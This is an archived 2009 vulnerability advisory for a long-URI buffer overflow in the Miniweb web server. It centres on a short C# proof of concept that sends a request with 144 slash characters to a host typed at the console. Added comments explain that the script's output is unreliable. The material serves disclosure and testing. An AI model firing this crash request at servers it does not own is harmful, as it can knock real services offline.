Miniweb Buffer Overflow

2009-04-16T00:00:00
ID SECURITYVULNS:DOC:21671
Type securityvulns
Reporter Securityvulns
Modified 2009-04-16T00:00:00

Description

############# Miniweb Remote Buffer Overflow
##By: e.wiZz!
##Site: www.balcansecurity.com
## Found with ServMeNot (world's sexiest fuzzer :P )

In the wild...

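Buffer overflow (BoF) when the requested URI is longer than roughly 120 characters. The proof of concept below requests a URI made of 144 "/" characters; this advisory does not name an affected Miniweb version or a fix.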

using System; using System.IO; using System.Net; using System.Text;

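namespace idiot
{
    /// <summary>
    /// Proof of concept for the Miniweb long-URI buffer overflow described in this advisory.
    /// It requests a URI made of 144 '/' characters from the host typed on standard input
    /// and prints a coarse result.
    /// </summary>
    /// <remarks>
    /// The result messages are not a reliable verdict on whether the server is affected:
    /// every exception is reported as "Cannot connect", which covers an invalid URL, a DNS
    /// failure, a refused connection and a dropped connection alike. HttpWebRequest also
    /// raises WebException for 4xx/5xx answers, so a server that rejects the long URI with
    /// an error status ends up in the same branch. Confirm the state of the Miniweb process
    /// and its logs on the server side instead of relying on this output.
    /// </remarks>
    class pf
    {
        /// <summary>
        /// Reads the target base URL from the console, sends one request and reports the outcome.
        /// </summary>
        /// <param name="args">Unused.</param>
        static void Main(string[] args)
        {
            Console.Write("Enter host:\n");
            string site = Console.ReadLine();

            // 144 '/' characters, above the ~120 length the advisory gives as the overflow threshold.
            string uri = new string('/', 144);

            try
            {
                HttpWebRequest request = (HttpWebRequest)WebRequest.Create(site + uri);

                // Dispose the response so the underlying connection is released.
                using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
                {
                    // Any response we get means that the exploit failed.
                    // NOTE(review): the header name is misspelled ("Content-Lenght"), so it never
                    // matches a real header and the comparison with "a" is effectively always
                    // true; the message is printed for every successful response.
                    if (response.GetResponseHeader("Content-Lenght") != "a")
                    {
                        Console.WriteLine("Exploit failed");
                    }
                }
            }
            catch (Exception ex)
            {
                // Catch-all: the printed exception message is the only hint at the real cause.
                Console.WriteLine("Cannot connect");
                Console.WriteLine("{0}", ex.Message);
            }
        }
    }
}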